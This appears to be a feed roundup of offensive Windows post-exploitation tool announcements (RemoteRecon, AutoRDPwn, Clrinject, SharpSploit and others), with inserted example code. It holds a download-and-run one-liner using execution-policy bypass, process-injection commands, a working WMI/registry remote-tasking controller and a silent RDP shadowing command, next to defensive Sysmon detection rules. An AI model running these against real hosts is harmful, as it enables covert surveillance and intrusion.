RemoteRecon – Remote Recon And Collection

RemoteRecon provides the ability to execute post-exploitation capabilities against a remote host without having to expose your complete toolkit/agent. Often, as operators, we need to compromise a host just so we can keylog or screenshot (or perform some other minor task) against a person/host of interest. Why should you have to push Beacon, Empire, Innuendo, Meterpreter, or a custom RAT to the target? Doing so increases your footprint in the target environment and exposes functionality in your agent and, most likely, your C2 infrastructure. An alternative is to deploy a secondary, minimal agent to targets of interest, collect intelligence, and store that data for retrieval at your discretion. If these compromised endpoints are discovered by IR teams, you lose those endpoints and the information you've collected, but nothing more. Below is a visual representation of how an adversary would utilize this.

RemoteRecon uses the registry for data storage, with WMI as an internal C2 channel. All commands are executed in an asynchronous, push-and-pull manner: you send commands via the PowerShell controller and then retrieve the results of that command from the registry. All results are displayed in the local console.

Current Capabilities
* PowerShell
* Screenshot
* Token Impersonation
* Inject Reflective DLL (must export the ReflectiveLoader function from Stephen Fewer's reflective DLL injection project)
* Inject Shellcode
* Keylog

Improvements, Additions, ToDos:
* Dynamically load and execute .NET assemblies
* Support non-reflective DLLs for injection

Build Dependencies
The RemoteRecon.ps1 script already contains a fully weaponized JS payload for the agent. The payload will only be updated as the code base changes. If you wish to make changes to the codebase on your own, there are a few dependencies required:
* Visual Studio 2015+
* Windows 7 and .NET SDK
* Windows 8.1 SDK
* mscorlib.tlh (included in the project, but there are instances where IntelliSense can't seem to find it [shrug])
* .NET 3.5 & 4
* James Forshaw's DotNetToJScript project
* Fody/Costura NuGet package (package and embed any extra dependencies in .NET)

For a short setup guide, please visit the wiki.

Download RemoteRecon
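The push-and-pull mechanism described above, as an added example that is not RemoteRecon's own code: a controller-side sketch that uses the documented StdRegProv WMI class to write a task value to a registry key on the remote host and then poll for a result value. The agent side (on RemoteRecon, the JS payload on the target) is not reproduced; the example assumes it writes its output to a value named result under the same key. The host name, key path and value names are assumptions.

```powershell
# Added example, not RemoteRecon's code: controller side of the
# registry-mailbox / WMI-transport pattern, built on the documented
# StdRegProv class. Host name, key path and value names are assumptions.

$Target = 'WS01.corp.example'
$SubKey = 'SOFTWARE\Contoso\Telemetry'    # hypothetical mailbox key
$HKLM   = [uint32]2147483650             # 0x80000002 = HKEY_LOCAL_MACHINE

# One CIM session carries every call; DCOM by default, WinRM if you pass
# -SessionOption (New-CimSessionOption -Protocol Wsman).
$Session = New-CimSession -ComputerName $Target

function Invoke-RemoteReg {
    # Thin wrapper: every StdRegProv method takes hDefKey + sSubKeyName plus extras.
    param([string]$Method, [hashtable]$Extra = @{})
    $params = @{ hDefKey = $HKLM; sSubKeyName = $SubKey } + $Extra
    Invoke-CimMethod -CimSession $Session -Namespace root/default -ClassName StdRegProv `
                     -MethodName $Method -Arguments $params
}

function Send-Task {
    # Push: the controller writes the tasking; the agent on the host picks it up later.
    param([string]$Command)
    $r = Invoke-RemoteReg -Method SetStringValue -Extra @{ sValueName = 'task'; sValue = $Command }
    if ($r.ReturnValue -ne 0) { throw "SetStringValue failed, Win32 error $($r.ReturnValue)" }
}

function Receive-Result {
    # Pull: returns the agent's output, or $null while the 'result' value does not exist yet.
    $r = Invoke-RemoteReg -Method GetStringValue -Extra @{ sValueName = 'result' }
    if ($r.ReturnValue -eq 0) { return $r.sValue }   # 2 = ERROR_FILE_NOT_FOUND: nothing yet
    return $null
}

# Make sure the mailbox key exists, then task and poll asynchronously.
$null = Invoke-RemoteReg -Method CreateKey
Send-Task 'screenshot'
do { Start-Sleep -Seconds 5; $result = Receive-Result } until ($result)
$result

# Remove the result from the mailbox and drop the session.
$null = Invoke-RemoteReg -Method DeleteValue -Extra @{ sValueName = 'result' }
Remove-CimSession $Session
```

Nothing in this exchange is invisible to the host: the remote StdRegProv calls execute inside WmiPrvSE.exe on the target, so a Sysmon RegistryEvent (SetValue) rule sees each write with WmiPrvSE.exe as the Image, and the DCOM or WinRM connection that carried the call is logged as well. That is the trade-off the post describes: a smaller footprint than a full agent, not an invisible one.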

Link: http://feedproxy.google.com/~r/PentestTools/~3/yXXX3vBqgJk/remoterecon-remote-recon-and-collection.html

AutoRDPwn – The Shadow Attack Framework

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. The attack abuses Remote Desktop session shadowing: when the shadowing policy on the target permits it, a remote attacker can view the victim's desktop without their consent, and even control it on request. For correct operation, the requirements described in the user guide must be met.

Requirements
* PowerShell 5.0 or higher

Changes
Version 4.0
• Fixed a bug in the scheduled task that removes the AutoRDPwn user
• The Scheduled Task attack has been replaced by Invoke-Command
• It is now possible to choose the language of the application and launch the attack on English versions of Windows
*The rest of the changes can be consulted in the CHANGELOG file

Use
Execution in one line:

    powershell -ExecutionPolicy Bypass "cd $env:TEMP; iwr https://goo.gl/HSkAXP -Outfile AutoRDPwn.ps1; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• Stas'M Corp. for its RDP Wrapper tool -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz

Contact
This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact info@darkbyte.net

Download AutoRDPwn
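The two preconditions the Shadow attack rests on, as an added example that is not part of AutoRDPwn: the shadowing mode configured on the target (the Shadow DWORD under the Terminal Services policy key, or failing that under the RDP-Tcp WinStation key) and a live session ID for mstsc /shadow. The host name is an assumption; the mode table is the documented meaning of the policy "Set rules for remote control of Remote Desktop Services user sessions".

```powershell
# Added example, not part of AutoRDPwn. Reports whether silent shadowing is
# possible on a host and what command line it would take. Host name is assumed.

$Target = 'WS01.corp.example'

# Meaning of the Shadow DWORD (identical for the policy key and the per-WinStation key).
$ShadowModes = @{
    0 = 'Remote control disabled'
    1 = 'Full control, user must consent'
    2 = 'Full control, no consent required'
    3 = 'View only, user must consent'
    4 = 'View only, no consent required'
}

function Get-ShadowMode {
    param([string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $gpo   = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services' `
                                  -Name Shadow -ErrorAction SilentlyContinue
        $local = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' `
                                  -Name Shadow -ErrorAction SilentlyContinue
        # A policy value overrides the per-WinStation setting when both exist.
        if ($gpo) { [int]$gpo.Shadow } elseif ($local) { [int]$local.Shadow } else { $null }
    }
}

$mode = Get-ShadowMode -ComputerName $Target
if ($null -eq $mode) {
    "${Target}: no Shadow value set (default behaviour applies)"
} else {
    "${Target}: Shadow=$mode ($($ShadowModes[$mode]))"
}

# Sessions on the target; the ID column is what mstsc /shadow takes.
query session /server:$Target

# Only modes 2 and 4 are silent; 1 and 3 put a consent prompt on the user's screen.
if ($mode -in 2, 4) {
    $control = if ($mode -eq 2) { ' /control' } else { '' }
    "Silent shadowing possible: mstsc /v:$Target /shadow:<ID> /noConsentPrompt$control"
}
```

For the defender the same two keys are the fix and the tripwire: set the policy to disabled or to a consent-required mode, and alert on any write to the Shadow value (Sysmon RegistryEvent covers it), since a tool that wants silent access has to change it first.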

Link: http://feedproxy.google.com/~r/PentestTools/~3/FJO5eg5Xcpk/autordpwn-shadow-attack-framework.html

Clrinject – Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

Injects a C# EXE or DLL assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process's classes and therefore affect its internal state.

Usage

    clrinject-cli.exe -p <processId|processName> -a <assemblyFile>

Opens the process with id <processId> or name <processName>, injects the <assemblyFile> EXE and executes its Main method.

Additional options
* -e  Enumerates all loaded CLR runtimes and created AppDomains.
* -d <#>  Inject only into the <#>-th AppDomain. If no number or zero is specified, the assembly is injected into every AppDomain.
* -i <namespace>.<className>  Create an instance of class <className> from namespace <namespace>.

Examples

    clrinject-cli.exe -p victim.exe -e
    (Enumerate runtimes and AppDomains from victim.exe)

    clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
    (Inject invader.exe into the second AppDomain of the process with id 1234)

    clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
    (Create an instance of Invader inside every AppDomain in victim.exe)

    clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
    (Inject an x64 assembly into an x64 process)

Injectable assembly example
The following code can be compiled as a C# executable and then injected into a PowerShell process. It accesses static instances of internal PowerShell classes to change the console text color to green.

    using System;
    using System.Reflection;
    using Microsoft.PowerShell;
    using System.Management.Automation.Host;

    namespace Invader
    {
        class Invader
        {
            static void Main(string[] args)
            {
                try
                {
                    // ConsoleHost and its SingletonInstance property are internal to
                    // Microsoft.PowerShell.ConsoleHost, so reach them through reflection.
                    var powerShellAssembly = typeof(ConsoleShell).Assembly;
                    var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                    var consoleHost = consoleHostType
                        .GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic)
                        .GetValue(null);
                    // The public UI property hands back the host's user interface object.
                    var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                    ui.RawUI.ForegroundColor = ConsoleColor.Green;
                }
                catch (Exception e)
                {
                    Console.WriteLine(e.ToString());
                }
            }
        }
    }

Injection command:

    clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Result: (screenshot)

Download Clrinject

Link: http://feedproxy.google.com/~r/PentestTools/~3/pK8N-dwlNI8/clrinject-injects-c-exe-or-dll-assembly.html

Operating Offensively Against Sysmon

Sysmon is a tool written by Mark Russinovich that I have covered in multiple blog posts; I even wrote a PowerShell module called Posh-Sysmon to help with the generation of configuration files for it. Its main purpose is tracking potentially malicious activity on individual hosts, and it is based on the same technology as Procmon. It differs from other Sysinternals tools in that Sysmon is actually installed on the host (as a service with a kernel driver) and writes its information into the Windows Event Log, so it is easier to collect with SIEM (Security Information and Event Management) tools.

Sysmon has the capability to log information for:
* Process Creation and Termination
* Process changing a file creation time.
* Network Connection
* Driver Load
* Image Load
* CreateRemoteThread
* Raw Access Read of a file
* A process opens another process memory
* File Creation
* Registry Events
* Pipe Events
* WMI Permanent Events 
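Three of the event types listed above (CreateRemoteThread, a process opening another process's memory, and registry value writes) are the ones the injection and registry-mailbox tools earlier on this page leave behind. The following is an added example, not from the post and not Sysmon's own logic: four constructed events in the XML shape Sysmon writes to the Microsoft-Windows-Sysmon/Operational channel (event namespace and unused fields omitted), a flattener for the <Data Name="..."> layout, and three illustrative triage rules applied first to the sample and then, by the same code path, to the live log.

```powershell
# Added example, not part of the post or of Sysmon. Sample events are constructed;
# the triage rules are illustrative thresholds, not Sysmon configuration.
$SampleEvents = @'
<Events>
 <Event><System><EventID>8</EventID></System><EventData>
  <Data Name="SourceImage">C:\Tools\injector.exe</Data>
  <Data Name="TargetImage">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
  <Data Name="StartModule">-</Data>
 </EventData></Event>
 <Event><System><EventID>10</EventID></System><EventData>
  <Data Name="SourceImage">C:\Windows\System32\svchost.exe</Data>
  <Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
  <Data Name="GrantedAccess">0x1000</Data>
 </EventData></Event>
 <Event><System><EventID>10</EventID></System><EventData>
  <Data Name="SourceImage">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
  <Data Name="TargetImage">C:\Windows\System32\lsass.exe</Data>
  <Data Name="GrantedAccess">0x1010</Data>
 </EventData></Event>
 <Event><System><EventID>13</EventID></System><EventData>
  <Data Name="EventType">SetValue</Data>
  <Data Name="Image">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
  <Data Name="TargetObject">HKLM\SOFTWARE\Contoso\Telemetry\task</Data>
  <Data Name="Details">screenshot</Data>
 </EventData></Event>
</Events>
'@

function ConvertFrom-SysmonEvent {
    # Flatten the <Data Name="..."> elements into one object with an EventId property.
    param([System.Xml.XmlElement]$Event)
    $props = [ordered]@{ EventId = [int]$Event.System.EventID }
    foreach ($d in $Event.EventData.Data) { $props[$d.Name] = $d.'#text' }
    [pscustomobject]$props
}

function Test-SysmonEvent {
    # Returns a finding string for events worth a look, $null otherwise.
    param([pscustomobject]$E)
    switch ($E.EventId) {
        8 {
            # CreateRemoteThread whose start address is not inside any loaded module
            # (Sysmon logs "-") is the textbook footprint of injected code.
            if ($E.StartModule -eq '-') {
                return "Unbacked remote thread: $($E.SourceImage) -> $($E.TargetImage)"
            }
        }
        10 {
            # ProcessAccess on lsass.exe with PROCESS_VM_READ (0x0010) set is what a
            # credential dumper needs; 0x1000 (QUERY_LIMITED_INFORMATION) alone is noise.
            $access = [Convert]::ToInt32($E.GrantedAccess, 16)
            if ($E.TargetImage -like '*\lsass.exe' -and ($access -band 0x10)) {
                return "LSASS memory read: $($E.SourceImage) (GrantedAccess $($E.GrantedAccess))"
            }
        }
        13 {
            # RegistryEvent SetValue performed by the WMI provider host outside the keys
            # WMI itself maintains: the footprint of remote StdRegProv tasking.
            if ($E.Image -like '*\WmiPrvSE.exe' -and $E.TargetObject -notlike 'HKLM\SOFTWARE\Microsoft\*') {
                return "WMI-driven registry write: $($E.TargetObject) = $($E.Details)"
            }
        }
    }
    return $null
}

function Get-SysmonFindings {
    # Same rules over the live channel; needs Sysmon installed and an elevated shell.
    param([int]$MaxEvents = 1000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 8, 10, 13 } -MaxEvents $MaxEvents |
        ForEach-Object { Test-SysmonEvent (ConvertFrom-SysmonEvent ([xml]$_.ToXml()).Event) } |
        Where-Object { $_ }
}

# Offline run over the constructed sample: three findings; the svchost event is dropped.
([xml]$SampleEvents).Events.Event |
    ForEach-Object { Test-SysmonEvent (ConvertFrom-SysmonEvent $_) } |
    Where-Object { $_ }
```

The rules are deliberately narrow so they can be read in one sitting; in practice the GrantedAccess and Image checks belong in the Sysmon configuration's include/exclude filters, so the noisy events never reach the log in the first place, which is exactly what the post goes on to discuss from the attacker's side.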

Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon

DbgShell – A PowerShell Front-End For The Windows Debugger Engine

A PowerShell front-end for the Windows debugger engine. Ready to tab your way to glory? For a quicker intro, take a look at Getting Started.

Disclaimers
This project is not produced, endorsed, or monitored by the Windows debugger team. While the debugger team welcomes feedback about their API and front ends (windbg, kd, et al), they have no connection with this project. Do not file bugs or feedback to the debugger team concerning this project. This is not a funded project: it has no official resources allocated to it, and is only worked on by volunteers. Do not take any production dependency on this project unless you are willing to support it completely yourself. Feel free to file Issues and submit Pull Requests, but understand that with the limited volunteer resources, it may be a while before your submissions are handled. This is an experimental project: it is not fully baked, and you should expect breaking changes to be made often. Corollary of the above disclaimers: I would avoid attaching DbgShell to live targets of high value.

Binaries
https://aka.ms/dbgshell-latest

Motivation
Have you ever tried automating anything in the debugger (cdb/ntsd/kd/windbg)? How did that go for you?

The main impetus for DbgShell is that it's just waaaay too hard to automate anything in the debugger. There are facilities today to assist in automating the debugger, of course, but in my opinion they are not meeting people's needs.
* Using the built-in scripting language is arcane, limited, difficult to get right, and difficult to get help with.
* DScript is kind of neat, but virtually unknown, it lacks a REPL, and it's too low-level.
* Writing a full-blown debugger extension DLL is very powerful, but it's a significant investment, way too expensive for solving quick, "one-off" problems as you debug random, real-world problems. Despite the cost, there are a large number of debugger extensions in existence. I think there should not be nearly so many; I think the only reason there are so many is that there aren't viable alternatives.
* Existing attempts at providing a better interface (such as PowerDbg) are based on "scraping" and text parsing, which is hugely limiting (not to mention ideologically annoying) and thus are not able to fulfill the promise of a truly better interface (they are only marginally better, at best).
* Existing attempts to provide an easier way to write a debugger extension are merely a stop-gap addressing the pain of developing a debugger extension; they don't really solve the larger problem. (For instance, two major shortcomings are that they are still too low-level (you have to deal with the dbgeng COM API), and there's no REPL.)
* The debugger team has recently introduced JavaScript scripting. JavaScript is a much better (and more well-defined) language than the old windbg scripting language, but I think that PowerShell has some advantages, the largest of which is that nobody really uses a JavaScript shell; PowerShell is much better as a combined shell and scripting language.

The goal of the DbgShell project is to bring the goodness of the object-based PowerShell world to the debugging world. When you do 'dt' to dump an 'object', you should get an actual object. Scripting should be as easy as writing a PowerShell script.

The DbgShell project provides a PowerShell front-end for dbgeng.dll, including:
* a managed "object model" (usable from C# if you wished), which is higher-level than the dbgeng COM API,
* a PowerShell "navigation provider", which exposes aspects of a debugging target as a hierarchical namespace (so you can "cd" to a particular thread, type "dir" to see the stack, "cd" into a frame, do another "dir" to see locals/registers/etc.),
* cmdlets for manipulating the target,
* a custom PowerShell host which allows better control of the debugger CLI experience, as well as providing features not available in the standard powershell.exe host (namely, support for text colorization using ANSI escape codes (a la ISO/IEC 6429)).

The custom host is still a command-line (conhost.exe-based) program (analogous to ntsd/cdb/kd), but it can be invoked from windbg (!DbgShell).

In addition to making automation much easier and more powerful, it will address other concerns as well, such as ease of use for people who don't have to use the debuggers so often. (One complaint I've heard is that "when I end up needing to use windbg, I spend all my time in the .CHM".)

For seasoned windbg users, on the other hand, another goal is to make the transition as seamless as possible. So, for instance, the namespace provider is not the only way to access data; you can still use traditional commands like "~3 s", "k", etc.

Screenshots

Notable Features
* Color: support for text colorization using ANSI escape codes (a la ISO/IEC 6429).
* Custom formatting engine: Don't like .ps1xml stuff? Me neither. In addition to standard table, list, and custom views, you can define "single-line" views which are very handy for customizing symbol value displays.
* Custom symbol value conversion: For most variables, the default conversion and display are good. But sometimes you'd like the debugger to do a little more work for you. The symbol value conversion feature allows, for instance, STL collection objects to be transformed into .NET collection objects that are much easier to deal with.
* Derived type detection: For when your variable is an IFoo, but the actual object is a FooImpl.
* Rich type information: exposed for your programmatic pleasure.

Q: Does it work in WinDbg? I will only use WinDbg.
A: Yes. Load up the DbgShellExt.dll extension DLL, and then run "!dbgshell" to pop open a DbgShell console.

Other topics
* Getting Started with DbgShell
* Color
* Custom formatting engine
* Custom symbol value conversion
* Derived type detection
* Rich type information
* Hacking on DbgShell
* DbgEngWrapper

You can find a short (3 minute) video introduction here: https://youtu.be/ynbg2zZ1Igc

Download DbgShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/Odr9tvWj8e0/dbgshell-powershell-front-end-for.html

SharpSploit – A .NET Post-Exploitation Library Written In C#

SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.

SharpSploit is named, in part, as a homage to the PowerSploit project, a personal favorite of mine! While SharpSploit does port over some functionality from PowerSploit, my intention is not at all to create a direct port of PowerSploit. SharpSploit will be its own project, albeit with similar goals to PowerSploit.

Intro
You'll find some details and motivations for the SharpSploit project in this introductory blog post.

Documentation
The complete SharpSploit API docfx documentation is available here. For an easier to read, high-level quick reference and summary of SharpSploit functionality, refer to the SharpSploit – Quick Command Reference.

Credits
SharpSploit ports many modules written in PowerShell by others, utilizes techniques discovered by others, and borrows ideas and code from other C# projects as well:
* Justin Bui (@youslydawg) – For contributing the SharpSploit.Enumeration.Host.CreateProcessDump() function.
* Matt Graeber (@mattifestation), Will Schroeder (@harmj0y), and Ruben (@FuzzySec) – For their work on PowerSploit.
* Will Schroeder (@harmj0y) – For the PowerView project.
* Alexander Leary (@0xbadjuju) – For the Tokenvator project.
* James Forshaw (@tiraniddo) – For his discovery of the token duplication UAC bypass technique documented here.
* Matt Nelson (@enigma0x3) – For his Invoke-TokenDuplication implementation of the token duplication UAC bypass, as well as his C# shellcode execution method.
* Benjamin Delpy (@gentilkiwi) – For the Mimikatz project.
* Casey Smith (@subtee) – For his work on a C# PE loader.
* Chris Ross (@xorrior) – For his implementation of a Mimikatz PE loader found here.
* Matt Graeber (@mattifestation) – For discovery of the AMSI bypass found here.
* Lee Christensen (@tifkin_) – For the discovery of the PowerShell logging bypass found here.
* All the contributors to www.pinvoke.net – For numerous PInvoke signatures.

Download SharpSploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/egVvC26MSXU/sharpsploit-net-post-exploitation.html

Leaked? 2.0 – A Checking Tool For Hash Codes, Passwords And Emails Leaked

Leaked? is a checking tool for leaked hash codes, passwords and emails. It uses the leakz module from Aidan Holland, and the leakz module uses the API from Aurelius Wendelken. Leaked? can run on any OS that supports Python 3 or 2.

What's new?
* Check email leaked
* Update
* More user friendly
* Support for Python 2 and 3

Features
* Check passwords leaked
* Check hash code leaked
* Check email leaked (NEW!)
* Update (NEW!)
* Exit
* About Author

Install and Run in Linux

    sudo apt update && sudo apt install python3 python3-pip
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip3 install -r requirements.txt
    pip install -r requirements.txt
    python3 leaked.py
    or python leaked.py

Install and Run in Windows
Download and run the Python 3 setup file from Python.org. In "Install Python 3", enable "Add Python 3.7 to PATH" and "For all users". Download and run the Git setup file from Git-scm.com, and choose "Use Git from Windows Command Prompt". After that, run Command Prompt or PowerShell and enter these commands:

    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip install -r requirements.txt
    python leaked.py

Update Leaked?: git pull -f

Notes
Leaked? uses the leakz module from Aidan Holland, and the leakz module uses the API from Aurelius Wendelken. Follow their Twitter accounts!

Screenshots

Contact the Author
Twitter: @SecureGF
Facebook: @GitHackTools
Google Plus: +TVT618

Download Leaked

Link: http://feedproxy.google.com/~r/PentestTools/~3/ln-jAlMtxV8/leaked-20-checking-tool-for-hash-codes.html

Microsoft, Elon Musk, Kernel and Powershell – Paul’s Security Weekly #575

Microsoft accidentally lets an encrypted Windows 10 build out to the world, a kernel exploit is discovered in macOS, PowerShell obfuscation ups the ante on anti-virus, Google outlines its incident response process, Bomgar buys BeyondTrust, and Neil deGrasse Tyson speaks on Elon Musk, saying: Let the man get high! All that and more, on this episode of Paul's Security […]
The post Microsoft, Elon Musk, Kernel and Powershell – Paul’s Security Weekly #575 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/5xi_2xuShz4/

iBombShell: A Dynamic Post-Exploitation Remote Shell

Consider that you have a shell on a system and other post-exploitation tools do not work for you because they are being caught by a security solution on the system. Worry not: we now have iBombShell, a dynamic remote shell that can be run on any system that supports PowerShell. The reason this is called dynamic…
Read more about iBombShell: A Dynamic Post-Exploitation Remote Shell
The post iBombShell: A Dynamic Post-Exploitation Remote Shell appeared first on PenTestIT.

Link: http://pentestit.com/ibombshell-dynamic-post-exploitation-remote-shell/